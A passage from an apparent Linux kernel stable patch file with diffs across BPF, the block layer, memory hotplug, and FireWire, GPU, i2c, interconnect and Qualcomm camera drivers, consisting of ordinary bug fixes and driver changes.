++			 */
++			RESTORE_TAIL_CALL_CNT(stack_size);
+ 
+ 		if (flags & BPF_TRAMP_F_ORIG_STACK) {
+-			emit_ldx(&prog, BPF_DW, BPF_REG_0, BPF_REG_FP, 8);
+-			EMIT2(0xff, 0xd0); /* call *rax */
++			emit_ldx(&prog, BPF_DW, BPF_REG_6, BPF_REG_FP, 8);
++			EMIT2(0xff, 0xd3); /* call *rbx */
+ 		} else {
+ 			/* call original function */
+ 			if (emit_call(&prog, orig_call, prog)) {
+@@ -2195,7 +2186,7 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 		}
+ 
+ 	if (flags & BPF_TRAMP_F_RESTORE_REGS)
+-		restore_regs(m, &prog, nr_args, regs_off);
++		restore_regs(m, &prog, nr_regs, regs_off);
+ 
+ 	/* This needs to be done regardless. If there were fmod_ret programs,
+ 	 * the return value is only updated on the stack and still needs to be
+@@ -2209,7 +2200,12 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 			ret = -EINVAL;
+ 			goto cleanup;
+ 		}
+-	}
++	} else if (flags & BPF_TRAMP_F_TAIL_CALL_CTX)
++		/* Before running the original function, restore the
++		 * tail_call_cnt from stack to rax.
++		 */
++		RESTORE_TAIL_CALL_CNT(stack_size);
++
+ 	/* restore return value of orig_call or fentry prog back into RAX */
+ 	if (save_ret)
+ 		emit_ldx(&prog, BPF_DW, BPF_REG_0, BPF_REG_FP, -8);
+diff --git a/block/bdev.c b/block/bdev.c
+index d699ecdb32604..b61502ec8da06 100644
+--- a/block/bdev.c
++++ b/block/bdev.c
+@@ -507,6 +507,8 @@ struct block_device *bdev_alloc(struct gendisk *disk, u8 partno)
+ 
+ void bdev_add(struct block_device *bdev, dev_t dev)
+ {
++	if (bdev_stable_writes(bdev))
++		mapping_set_stable_writes(bdev->bd_inode->i_mapping);
+ 	bdev->bd_dev = dev;
+ 	bdev->bd_inode->i_rdev = dev;
+ 	bdev->bd_inode->i_ino = dev;
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 100fb0c3114f8..383d94615e502 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2855,11 +2855,8 @@ static struct request *blk_mq_get_new_requests(struct request_queue *q,
+ 	};
+ 	struct request *rq;
+ 
+-	if (unlikely(bio_queue_enter(bio)))
+-		return NULL;
+-
+ 	if (blk_mq_attempt_bio_merge(q, bio, nsegs))
+-		goto queue_exit;
++		return NULL;
+ 
+ 	rq_qos_throttle(q, bio);
+ 
+@@ -2875,35 +2872,23 @@ static struct request *blk_mq_get_new_requests(struct request_queue *q,
+ 	rq_qos_cleanup(q, bio);
+ 	if (bio->bi_opf & REQ_NOWAIT)
+ 		bio_wouldblock_error(bio);
+-queue_exit:
+-	blk_queue_exit(q);
+ 	return NULL;
+ }
+ 
+-static inline struct request *blk_mq_get_cached_request(struct request_queue *q,
+-		struct blk_plug *plug, struct bio **bio, unsigned int nsegs)
++/* return true if this @rq can be used for @bio */
++static bool blk_mq_can_use_cached_rq(struct request *rq, struct blk_plug *plug,
++		struct bio *bio)
+ {
+-	struct request *rq;
+-	enum hctx_type type, hctx_type;
++	enum hctx_type type = blk_mq_get_hctx_type(bio->bi_opf);
++	enum hctx_type hctx_type = rq->mq_hctx->type;
+ 
+-	if (!plug)
+-		return NULL;
+-	rq = rq_list_peek(&plug->cached_rq);
+-	if (!rq || rq->q != q)
+-		return NULL;
+-
+-	if (blk_mq_attempt_bio_merge(q, *bio, nsegs)) {
+-		*bio = NULL;
+-		return NULL;
+-	}
++	WARN_ON_ONCE(rq_list_peek(&plug->cached_rq) != rq);
+ 
+-	type = blk_mq_get_hctx_type((*bio)->bi_opf);
+-	hctx_type = rq->mq_hctx->type;
+ 	if (type != hctx_type &&
+ 	    !(type == HCTX_TYPE_READ && hctx_type == HCTX_TYPE_DEFAULT))
+-		return NULL;
+-	if (op_is_flush(rq->cmd_flags) != op_is_flush((*bio)->bi_opf))
+-		return NULL;
++		return false;
++	if (op_is_flush(rq->cmd_flags) != op_is_flush(bio->bi_opf))
++		return false;
+ 
+ 	/*
+ 	 * If any qos ->throttle() end up blocking, we will have flushed the
+@@ -2911,11 +2896,11 @@ static inline struct request *blk_mq_get_cached_request(struct request_queue *q,
+ 	 * before we throttle.
+ 	 */
+ 	plug->cached_rq = rq_list_next(rq);
+-	rq_qos_throttle(q, *bio);
++	rq_qos_throttle(rq->q, bio);
+ 
+-	rq->cmd_flags = (*bio)->bi_opf;
++	rq->cmd_flags = bio->bi_opf;
+ 	INIT_LIST_HEAD(&rq->queuelist);
+-	return rq;
++	return true;
+ }
+ 
+ static void bio_set_ioprio(struct bio *bio)
+@@ -2944,7 +2929,7 @@ void blk_mq_submit_bio(struct bio *bio)
+ 	struct request_queue *q = bdev_get_queue(bio->bi_bdev);
+ 	struct blk_plug *plug = blk_mq_plug(bio);
+ 	const int is_sync = op_is_sync(bio->bi_opf);
+-	struct request *rq;
++	struct request *rq = NULL;
+ 	unsigned int nr_segs = 1;
+ 	blk_status_t ret;
+ 
+@@ -2955,20 +2940,36 @@ void blk_mq_submit_bio(struct bio *bio)
+ 			return;
+ 	}
+ 
+-	if (!bio_integrity_prep(bio))
+-		return;
+-
+ 	bio_set_ioprio(bio);
+ 
+-	rq = blk_mq_get_cached_request(q, plug, &bio, nr_segs);
+-	if (!rq) {
+-		if (!bio)
++	if (plug) {
++		rq = rq_list_peek(&plug->cached_rq);
++		if (rq && rq->q != q)
++			rq = NULL;
++	}
++	if (rq) {
++		if (!bio_integrity_prep(bio))
+ 			return;
+-		rq = blk_mq_get_new_requests(q, plug, bio, nr_segs);
+-		if (unlikely(!rq))
++		if (blk_mq_attempt_bio_merge(q, bio, nr_segs))
+ 			return;
++		if (blk_mq_can_use_cached_rq(rq, plug, bio))
++			goto done;
++		percpu_ref_get(&q->q_usage_counter);
++	} else {
++		if (unlikely(bio_queue_enter(bio)))
++			return;
++		if (!bio_integrity_prep(bio))
++			goto fail;
++	}
++
++	rq = blk_mq_get_new_requests(q, plug, bio, nr_segs);
++	if (unlikely(!rq)) {
++fail:
++		blk_queue_exit(q);
++		return;
+ 	}
+ 
++done:
+ 	trace_block_getrq(bio);
+ 
+ 	rq_qos_track(q, rq, bio);
+diff --git a/block/fops.c b/block/fops.c
+index 6197d1c41652d..01cb6260fa24d 100644
+--- a/block/fops.c
++++ b/block/fops.c
+@@ -655,24 +655,35 @@ static long blkdev_fallocate(struct file *file, int mode, loff_t start,
+ 
+ 	filemap_invalidate_lock(inode->i_mapping);
+ 
+-	/* Invalidate the page cache, including dirty pages. */
+-	error = truncate_bdev_range(bdev, file->f_mode, start, end);
+-	if (error)
+-		goto fail;
+-
++	/*
++	 * Invalidate the page cache, including dirty pages, for valid
++	 * de-allocate mode calls to fallocate().
++	 */
+ 	switch (mode) {
+ 	case FALLOC_FL_ZERO_RANGE:
+ 	case FALLOC_FL_ZERO_RANGE | FALLOC_FL_KEEP_SIZE:
++		error = truncate_bdev_range(bdev, file->f_mode, start, end);
++		if (error)
++			goto fail;
++
+ 		error = blkdev_issue_zeroout(bdev, start >> SECTOR_SHIFT,
+ 					     len >> SECTOR_SHIFT, GFP_KERNEL,
+ 					     BLKDEV_ZERO_NOUNMAP);
+ 		break;
+ 	case FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE:
++		error = truncate_bdev_range(bdev, file->f_mode, start, end);
++		if (error)
++			goto fail;
++
+ 		error = blkdev_issue_zeroout(bdev, start >> SECTOR_SHIFT,
+ 					     len >> SECTOR_SHIFT, GFP_KERNEL,
+ 					     BLKDEV_ZERO_NOFALLBACK);
+ 		break;
+ 	case FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE | FALLOC_FL_NO_HIDE_STALE:
++		error = truncate_bdev_range(bdev, file->f_mode, start, end);
++		if (error)
++			goto fail;
++
+ 		error = blkdev_issue_discard(bdev, start >> SECTOR_SHIFT,
+ 					     len >> SECTOR_SHIFT, GFP_KERNEL);
+ 		break;
+diff --git a/drivers/base/memory.c b/drivers/base/memory.c
+index 9aa0da991cfb9..5d39f3e374dae 100644
+--- a/drivers/base/memory.c
++++ b/drivers/base/memory.c
+@@ -175,6 +175,9 @@ int memory_notify(unsigned long val, void *v)
+ 	return blocking_notifier_call_chain(&memory_chain, val, v);
+ }
+ 
++/*
++ * Must acquire mem_hotplug_lock in write mode.
++ */
+ static int memory_block_online(struct memory_block *mem)
+ {
+ 	unsigned long start_pfn = section_nr_to_pfn(mem->start_section_nr);
+@@ -193,10 +196,11 @@ static int memory_block_online(struct memory_block *mem)
+ 	 * stage helps to keep accounting easier to follow - e.g vmemmaps
+ 	 * belong to the same zone as the memory they backed.
+ 	 */
++	mem_hotplug_begin();
+ 	if (nr_vmemmap_pages) {
+ 		ret = mhp_init_memmap_on_memory(start_pfn, nr_vmemmap_pages, zone);
+ 		if (ret)
+-			return ret;
++			goto out;
+ 	}
+ 
+ 	ret = online_pages(start_pfn + nr_vmemmap_pages,
+@@ -204,7 +208,7 @@ static int memory_block_online(struct memory_block *mem)
+ 	if (ret) {
+ 		if (nr_vmemmap_pages)
+ 			mhp_deinit_memmap_on_memory(start_pfn, nr_vmemmap_pages);
+-		return ret;
++		goto out;
+ 	}
+ 
+ 	/*
+@@ -216,9 +220,14 @@ static int memory_block_online(struct memory_block *mem)
+ 					  nr_vmemmap_pages);
+ 
+ 	mem->zone = zone;
++out:
++	mem_hotplug_done();
+ 	return ret;
+ }
+ 
++/*
++ * Must acquire mem_hotplug_lock in write mode.
++ */
+ static int memory_block_offline(struct memory_block *mem)
+ {
+ 	unsigned long start_pfn = section_nr_to_pfn(mem->start_section_nr);
+@@ -233,6 +242,7 @@ static int memory_block_offline(struct memory_block *mem)
+ 	 * Unaccount before offlining, such that unpopulated zone and kthreads
+ 	 * can properly be torn down in offline_pages().
+ 	 */
++	mem_hotplug_begin();
+ 	if (nr_vmemmap_pages)
+ 		adjust_present_page_count(pfn_to_page(start_pfn), mem->group,
+ 					  -nr_vmemmap_pages);
+@@ -244,13 +254,15 @@ static int memory_block_offline(struct memory_block *mem)
+ 		if (nr_vmemmap_pages)
+ 			adjust_present_page_count(pfn_to_page(start_pfn),
+ 						  mem->group, nr_vmemmap_pages);
+-		return ret;
++		goto out;
+ 	}
+ 
+ 	if (nr_vmemmap_pages)
+ 		mhp_deinit_memmap_on_memory(start_pfn, nr_vmemmap_pages);
+ 
+ 	mem->zone = NULL;
++out:
++	mem_hotplug_done();
+ 	return ret;
+ }
+ 
+diff --git a/drivers/firewire/ohci.c b/drivers/firewire/ohci.c
+index 17c9d825188bb..667ff40f39353 100644
+--- a/drivers/firewire/ohci.c
++++ b/drivers/firewire/ohci.c
+@@ -279,6 +279,51 @@ static char ohci_driver_name[] = KBUILD_MODNAME;
+ #define QUIRK_TI_SLLZ059		0x20
+ #define QUIRK_IR_WAKE			0x40
+ 
++// On PCI Express Root Complex in any type of AMD Ryzen machine, VIA VT6306/6307/6308 with Asmedia
++// ASM1083/1085 brings an inconvenience that the read accesses to 'Isochronous Cycle Timer' register
++// (at offset 0xf0 in PCI I/O space) often causes unexpected system reboot. The mechanism is not
++// clear, since the read access to the other registers is enough safe; e.g. 'Node ID' register,
++// while it is probable due to detection of any type of PCIe error.
++#define QUIRK_REBOOT_BY_CYCLE_TIMER_READ	0x80000000
++
++#if IS_ENABLED(CONFIG_X86)
++
++static bool has_reboot_by_cycle_timer_read_quirk(const struct fw_ohci *ohci)
++{
++	return !!(ohci->quirks & QUIRK_REBOOT_BY_CYCLE_TIMER_READ);
++}
++
++#define PCI_DEVICE_ID_ASMEDIA_ASM108X	0x1080
++
++static bool detect_vt630x_with_asm1083_on_amd_ryzen_machine(const struct pci_dev *pdev)
++{
++	const struct pci_dev *pcie_to_pci_bridge;
++
++	// Detect any type of AMD Ryzen machine.
++	if (!static_cpu_has(X86_FEATURE_ZEN))
++		return false;
++
++	// Detect VIA VT6306/6307/6308.
++	if (pdev->vendor != PCI_VENDOR_ID_VIA)
++		return false;
++	if (pdev->device != PCI_DEVICE_ID_VIA_VT630X)
++		return false;
++
++	// Detect Asmedia ASM1083/1085.
++	pcie_to_pci_bridge = pdev->bus->self;
++	if (pcie_to_pci_bridge->vendor != PCI_VENDOR_ID_ASMEDIA)
++		return false;
++	if (pcie_to_pci_bridge->device != PCI_DEVICE_ID_ASMEDIA_ASM108X)
++		return false;
++
++	return true;
++}
++
++#else
++#define has_reboot_by_cycle_timer_read_quirk(ohci) false
++#define detect_vt630x_with_asm1083_on_amd_ryzen_machine(pdev)	false
++#endif
++
+ /* In case of multiple matches in ohci_quirks[], only the first one is used. */
+ static const struct {
+ 	unsigned short vendor, device, revision, flags;
+@@ -1713,6 +1758,9 @@ static u32 get_cycle_time(struct fw_ohci *ohci)
+ 	s32 diff01, diff12;
+ 	int i;
+ 
++	if (has_reboot_by_cycle_timer_read_quirk(ohci))
++		return 0;
++
+ 	c2 = reg_read(ohci, OHCI1394_IsochronousCycleTimer);
+ 
+ 	if (ohci->quirks & QUIRK_CYCLE_TIMER) {
+@@ -3615,6 +3663,9 @@ static int pci_probe(struct pci_dev *dev,
+ 	if (param_quirks)
+ 		ohci->quirks = param_quirks;
+ 
++	if (detect_vt630x_with_asm1083_on_amd_ryzen_machine(dev))
++		ohci->quirks |= QUIRK_REBOOT_BY_CYCLE_TIMER_READ;
++
+ 	/*
+ 	 * Because dma_alloc_coherent() allocates at least one page,
+ 	 * we save space by using a common buffer for the AR request/
+diff --git a/drivers/firmware/arm_scmi/perf.c b/drivers/firmware/arm_scmi/perf.c
+index 431bda9165c3d..2775bcafe40f6 100644
+--- a/drivers/firmware/arm_scmi/perf.c
++++ b/drivers/firmware/arm_scmi/perf.c
+@@ -131,7 +131,7 @@ struct perf_dom_info {
+ 	u32 opp_count;
+ 	u32 sustained_freq_khz;
+ 	u32 sustained_perf_level;
+-	u32 mult_factor;
++	unsigned long mult_factor;
+ 	char name[SCMI_MAX_STR_SIZE];
+ 	struct scmi_opp opp[MAX_OPPS];
+ 	struct scmi_fc_info *fc_info;
+@@ -223,8 +223,8 @@ scmi_perf_domain_attributes_get(const struct scmi_protocol_handle *ph,
+ 			dom_info->mult_factor =	1000;
+ 		else
+ 			dom_info->mult_factor =
+-					(dom_info->sustained_freq_khz * 1000) /
+-					dom_info->sustained_perf_level;
++					(dom_info->sustained_freq_khz * 1000UL)
++					/ dom_info->sustained_perf_level;
+ 		strscpy(dom_info->name, attr->name, SCMI_SHORT_NAME_MAX_SIZE);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 8a1b84aaaf717..a5352e5e2bd47 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1976,15 +1976,8 @@ static int amdgpu_device_parse_gpu_info_fw(struct amdgpu_device *adev)
+ 
+ 	adev->firmware.gpu_info_fw = NULL;
+ 
+-	if (adev->mman.discovery_bin) {
+-		/*
+-		 * FIXME: The bounding box is still needed by Navi12, so
+-		 * temporarily read it from gpu_info firmware. Should be dropped
+-		 * when DAL no longer needs it.
+-		 */
+-		if (adev->asic_type != CHIP_NAVI12)
+-			return 0;
+-	}
++	if (adev->mman.discovery_bin)
++		return 0;
+ 
+ 	switch (adev->asic_type) {
+ 	default:
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+index 9d224bb2b3df6..ce893fe1c69f4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+@@ -438,7 +438,115 @@ struct _vcs_dpi_soc_bounding_box_st dcn2_0_nv14_soc = {
+ 	.use_urgent_burst_bw = 0
+ };
+ 
+-struct _vcs_dpi_soc_bounding_box_st dcn2_0_nv12_soc = { 0 };
++struct _vcs_dpi_soc_bounding_box_st dcn2_0_nv12_soc = {
++	.clock_limits = {
++		{
++			.state = 0,
++			.dcfclk_mhz = 560.0,
++			.fabricclk_mhz = 560.0,
++			.dispclk_mhz = 513.0,
++			.dppclk_mhz = 513.0,
++			.phyclk_mhz = 540.0,
++			.socclk_mhz = 560.0,
++			.dscclk_mhz = 171.0,
++			.dram_speed_mts = 1069.0,
++		},
++		{
++			.state = 1,
++			.dcfclk_mhz = 694.0,
++			.fabricclk_mhz = 694.0,
++			.dispclk_mhz = 642.0,
++			.dppclk_mhz = 642.0,
++			.phyclk_mhz = 600.0,
++			.socclk_mhz = 694.0,
++			.dscclk_mhz = 214.0,
++			.dram_speed_mts = 1324.0,
++		},
++		{
++			.state = 2,
++			.dcfclk_mhz = 875.0,
++			.fabricclk_mhz = 875.0,
++			.dispclk_mhz = 734.0,
++			.dppclk_mhz = 734.0,
++			.phyclk_mhz = 810.0,
++			.socclk_mhz = 875.0,
++			.dscclk_mhz = 245.0,
++			.dram_speed_mts = 1670.0,
++		},
++		{
++			.state = 3,
++			.dcfclk_mhz = 1000.0,
++			.fabricclk_mhz = 1000.0,
++			.dispclk_mhz = 1100.0,
++			.dppclk_mhz = 1100.0,
++			.phyclk_mhz = 810.0,
++			.socclk_mhz = 1000.0,
++			.dscclk_mhz = 367.0,
++			.dram_speed_mts = 2000.0,
++		},
++		{
++			.state = 4,
++			.dcfclk_mhz = 1200.0,
++			.fabricclk_mhz = 1200.0,
++			.dispclk_mhz = 1284.0,
++			.dppclk_mhz = 1284.0,
++			.phyclk_mhz = 810.0,
++			.socclk_mhz = 1200.0,
++			.dscclk_mhz = 428.0,
++			.dram_speed_mts = 2000.0,
++		},
++		{
++			.state = 5,
++			.dcfclk_mhz = 1200.0,
++			.fabricclk_mhz = 1200.0,
++			.dispclk_mhz = 1284.0,
++			.dppclk_mhz = 1284.0,
++			.phyclk_mhz = 810.0,
++			.socclk_mhz = 1200.0,
++			.dscclk_mhz = 428.0,
++			.dram_speed_mts = 2000.0,
++		},
++	},
++
++	.num_states = 5,
++	.sr_exit_time_us = 1.9,
++	.sr_enter_plus_exit_time_us = 4.4,
++	.urgent_latency_us = 3.0,
++	.urgent_latency_pixel_data_only_us = 4.0,
++	.urgent_latency_pixel_mixed_with_vm_data_us = 4.0,
++	.urgent_latency_vm_data_only_us = 4.0,
++	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
++	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
++	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
++	.pct_ideal_dram_sdp_bw_after_urgent_pixel_only = 40.0,
++	.pct_ideal_dram_sdp_bw_after_urgent_pixel_and_vm = 40.0,
++	.pct_ideal_dram_sdp_bw_after_urgent_vm_only = 40.0,
++	.max_avg_sdp_bw_use_normal_percent = 40.0,
++	.max_avg_dram_bw_use_normal_percent = 40.0,
++	.writeback_latency_us = 12.0,
++	.ideal_dram_bw_after_urgent_percent = 40.0,
++	.max_request_size_bytes = 256,
++	.dram_channel_width_bytes = 16,
++	.fabric_datapath_to_dcn_data_return_bytes = 64,
++	.dcn_downspread_percent = 0.5,
++	.downspread_percent = 0.5,
++	.dram_page_open_time_ns = 50.0,
++	.dram_rw_turnaround_time_ns = 17.5,
++	.dram_return_buffer_per_channel_bytes = 8192,
++	.round_trip_ping_latency_dcfclk_cycles = 131,
++	.urgent_out_of_order_return_per_channel_bytes = 4096,
++	.channel_interleave_bytes = 256,
++	.num_banks = 8,
++	.num_chans = 16,
++	.vmm_page_size_bytes = 4096,
++	.dram_clock_change_latency_us = 45.0,
++	.writeback_dram_clock_change_latency_us = 23.0,
++	.return_bus_width_bytes = 64,
++	.dispclk_dppclk_vco_speed_mhz = 3850,
++	.xfc_bus_transport_time_us = 20,
++	.xfc_xbuf_latency_tolerance_us = 50,
++	.use_urgent_burst_bw = 0,
++};
+ 
+ struct _vcs_dpi_ip_params_st dcn2_1_ip = {
+ 	.odm_capable = 1,
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi86.c b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+index 1b5c27ed27370..ff4d0564122a3 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi86.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+@@ -527,6 +527,7 @@ static ssize_t ti_sn_aux_transfer(struct drm_dp_aux *aux,
+ 	u32 request_val = AUX_CMD_REQ(msg->request);
+ 	u8 *buf = msg->buffer;
+ 	unsigned int len = msg->size;
++	unsigned int short_len;
+ 	unsigned int val;
+ 	int ret;
+ 	u8 addr_len[SN_AUX_LENGTH_REG + 1 - SN_AUX_ADDR_19_16_REG];
+@@ -600,7 +601,8 @@ static ssize_t ti_sn_aux_transfer(struct drm_dp_aux *aux,
+ 	}
+ 
+ 	if (val & AUX_IRQ_STATUS_AUX_SHORT) {
+-		ret = regmap_read(pdata->regmap, SN_AUX_LENGTH_REG, &len);
++		ret = regmap_read(pdata->regmap, SN_AUX_LENGTH_REG, &short_len);
++		len = min(len, short_len);
+ 		if (ret)
+ 			goto exit;
+ 	} else if (val & AUX_IRQ_STATUS_NAT_I2C_FAIL) {
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 5970f4149090f..4699c21102261 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -3707,7 +3707,7 @@ static void intel_dp_process_phy_request(struct intel_dp *intel_dp,
+ 			  intel_dp->train_set, crtc_state->lane_count);
+ 
+ 	drm_dp_set_phy_test_pattern(&intel_dp->aux, data,
+-				    link_status[DP_DPCD_REV]);
++				    intel_dp->dpcd[DP_DPCD_REV]);
+ }
+ 
+ static u8 intel_dp_autotest_phy_pattern(struct intel_dp *intel_dp)
+diff --git a/drivers/gpu/drm/mgag200/mgag200_drv.h b/drivers/gpu/drm/mgag200/mgag200_drv.h
+index f0c2349404b46..aebd09e2d4087 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_drv.h
++++ b/drivers/gpu/drm/mgag200/mgag200_drv.h
+@@ -390,6 +390,11 @@ void mgag200_primary_plane_helper_atomic_disable(struct drm_plane *plane,
+ 	.destroy = drm_plane_cleanup, \
+ 	DRM_GEM_SHADOW_PLANE_FUNCS
+ 
++void mgag200_crtc_set_gamma_linear(struct mga_device *mdev, const struct drm_format_info *format);
++void mgag200_crtc_set_gamma(struct mga_device *mdev,
++			    const struct drm_format_info *format,
++			    struct drm_color_lut *lut);
++
+ enum drm_mode_status mgag200_crtc_helper_mode_valid(struct drm_crtc *crtc,
+ 						    const struct drm_display_mode *mode);
+ int mgag200_crtc_helper_atomic_check(struct drm_crtc *crtc, struct drm_atomic_state *new_state);
+diff --git a/drivers/gpu/drm/mgag200/mgag200_g200er.c b/drivers/gpu/drm/mgag200/mgag200_g200er.c
+index bce267e0f7de3..8d4538b710477 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_g200er.c
++++ b/drivers/gpu/drm/mgag200/mgag200_g200er.c
+@@ -202,6 +202,11 @@ static void mgag200_g200er_crtc_helper_atomic_enable(struct drm_crtc *crtc,
+ 
+ 	mgag200_g200er_reset_tagfifo(mdev);
+ 
++	if (crtc_state->gamma_lut)
++		mgag200_crtc_set_gamma(mdev, format, crtc_state->gamma_lut->data);
++	else
++		mgag200_crtc_set_gamma_linear(mdev, format);
++
+ 	mgag200_enable_display(mdev);
+ 
+ 	if (funcs->enable_vidrst)
+diff --git a/drivers/gpu/drm/mgag200/mgag200_g200ev.c b/drivers/gpu/drm/mgag200/mgag200_g200ev.c
+index ac957f42abe18..56e6f986bff31 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_g200ev.c
++++ b/drivers/gpu/drm/mgag200/mgag200_g200ev.c
+@@ -203,6 +203,11 @@ static void mgag200_g200ev_crtc_helper_atomic_enable(struct drm_crtc *crtc,
+ 
+ 	mgag200_g200ev_set_hiprilvl(mdev);
+ 
++	if (crtc_state->gamma_lut)
++		mgag200_crtc_set_gamma(mdev, format, crtc_state->gamma_lut->data);
++	else
++		mgag200_crtc_set_gamma_linear(mdev, format);
++
+ 	mgag200_enable_display(mdev);
+ 
+ 	if (funcs->enable_vidrst)
+diff --git a/drivers/gpu/drm/mgag200/mgag200_g200se.c b/drivers/gpu/drm/mgag200/mgag200_g200se.c
+index bd6e573c9a1a3..ff2b3c6622e7a 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_g200se.c
++++ b/drivers/gpu/drm/mgag200/mgag200_g200se.c
+@@ -334,6 +334,11 @@ static void mgag200_g200se_crtc_helper_atomic_enable(struct drm_crtc *crtc,
+ 
+ 	mgag200_g200se_set_hiprilvl(mdev, adjusted_mode, format);
+ 
++	if (crtc_state->gamma_lut)
++		mgag200_crtc_set_gamma(mdev, format, crtc_state->gamma_lut->data);
++	else
++		mgag200_crtc_set_gamma_linear(mdev, format);
++
+ 	mgag200_enable_display(mdev);
+ 
+ 	if (funcs->enable_vidrst)
+diff --git a/drivers/gpu/drm/mgag200/mgag200_mode.c b/drivers/gpu/drm/mgag200/mgag200_mode.c
+index ae90b260312a5..554adf05e0734 100644
+--- a/drivers/gpu/drm/mgag200/mgag200_mode.c
++++ b/drivers/gpu/drm/mgag200/mgag200_mode.c
+@@ -28,8 +28,8 @@
+  * This file contains setup code for the CRTC.
+  */
+ 
+-static void mgag200_crtc_set_gamma_linear(struct mga_device *mdev,
+-					  const struct drm_format_info *format)
++void mgag200_crtc_set_gamma_linear(struct mga_device *mdev,
++				   const struct drm_format_info *format)
+ {
+ 	int i;
+ 
+@@ -65,9 +65,9 @@ static void mgag200_crtc_set_gamma_linear(struct mga_device *mdev,
+ 	}
+ }
+ 
+-static void mgag200_crtc_set_gamma(struct mga_device *mdev,
+-				   const struct drm_format_info *format,
+-				   struct drm_color_lut *lut)
++void mgag200_crtc_set_gamma(struct mga_device *mdev,
++			    const struct drm_format_info *format,
++			    struct drm_color_lut *lut)
+ {
+ 	int i;
+ 
+diff --git a/drivers/i2c/i2c-core.h b/drivers/i2c/i2c-core.h
+index 05b8b8dfa9bdd..36587f38dff3d 100644
+--- a/drivers/i2c/i2c-core.h
++++ b/drivers/i2c/i2c-core.h
+@@ -3,6 +3,7 @@
+  * i2c-core.h - interfaces internal to the I2C framework
+  */
+ 
++#include <linux/kconfig.h>
+ #include <linux/rwsem.h>
+ 
+ struct i2c_devinfo {
+@@ -29,7 +30,8 @@ int i2c_dev_irq_from_resources(const struct resource *resources,
+  */
+ static inline bool i2c_in_atomic_xfer_mode(void)
+ {
+-	return system_state > SYSTEM_RUNNING && !preemptible();
++	return system_state > SYSTEM_RUNNING &&
++	       (IS_ENABLED(CONFIG_PREEMPT_COUNT) ? !preemptible() : irqs_disabled());
+ }
+ 
+ static inline int __i2c_lock_bus_helper(struct i2c_adapter *adap)
+diff --git a/drivers/interconnect/qcom/sm8250.c b/drivers/interconnect/qcom/sm8250.c
+index 9c2dd40d9a559..5cdb058fa0959 100644
+--- a/drivers/interconnect/qcom/sm8250.c
++++ b/drivers/interconnect/qcom/sm8250.c
+@@ -551,7 +551,6 @@ static struct platform_driver qnoc_driver = {
+ 	.driver = {
+ 		.name = "qnoc-sm8250",
+ 		.of_match_table = qnoc_of_match,
+-		.sync_state = icc_sync_state,
+ 	},
+ };
+ module_platform_driver(qnoc_driver);
+diff --git a/drivers/media/platform/qcom/camss/camss-csid-gen2.c b/drivers/media/platform/qcom/camss/camss-csid-gen2.c
+index 904208f6f9546..0147cc062e1ae 100644
+--- a/drivers/media/platform/qcom/camss/camss-csid-gen2.c
++++ b/drivers/media/platform/qcom/camss/camss-csid-gen2.c
+@@ -334,13 +334,14 @@ static const struct csid_format csid_formats[] = {
+ 	},
+ };
+ 
+-static void csid_configure_stream(struct csid_device *csid, u8 enable)
++static void __csid_configure_stream(struct csid_device *csid, u8 enable, u8 vc)
+ {
+ 	struct csid_testgen_config *tg = &csid->testgen;
+ 	u32 val;
+ 	u32 phy_sel = 0;
+ 	u8 lane_cnt = csid->phy.lane_cnt;
+-	struct v4l2_mbus_framefmt *input_format = &csid->fmt[MSM_CSID_PAD_SRC];
++	/* Source pads matching RDI channels on hardware. Pad 1 -> RDI0, Pad 2 -> RDI1, etc. */
++	struct v4l2_mbus_framefmt *input_format = &csid->fmt[MSM_CSID_PAD_FIRST_SRC + vc];
+ 	const struct csid_format *format = csid_get_fmt_entry(csid->formats, csid->nformats,
+ 							      input_format->code);
+ 
+@@ -351,8 +352,19 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 		phy_sel = csid->phy.csiphy_id;
+ 
+ 	if (enable) {
+-		u8 vc = 0; /* Virtual Channel 0 */
+-		u8 dt_id = vc * 4;
++		/*
++		 * DT_ID is a two bit bitfield that is concatenated with
++		 * the four least significant bits of the five bit VC
++		 * bitfield to generate an internal CID value.
++		 *
++		 * CSID_RDI_CFG0(vc)
++		 * DT_ID : 28:27
++		 * VC    : 26:22
++		 * DT    : 21:16
++		 *
++		 * CID   : VC 3:0 << 2 | DT_ID 1:0
++		 */
++		u8 dt_id = vc & 0x03;
+ 
+ 		if (tg->enabled) {
+ 			/* configure one DT, infinite frames */
+@@ -392,42 +404,42 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 		val |= format->data_type << RDI_CFG0_DATA_TYPE;
+ 		val |= vc << RDI_CFG0_VIRTUAL_CHANNEL;
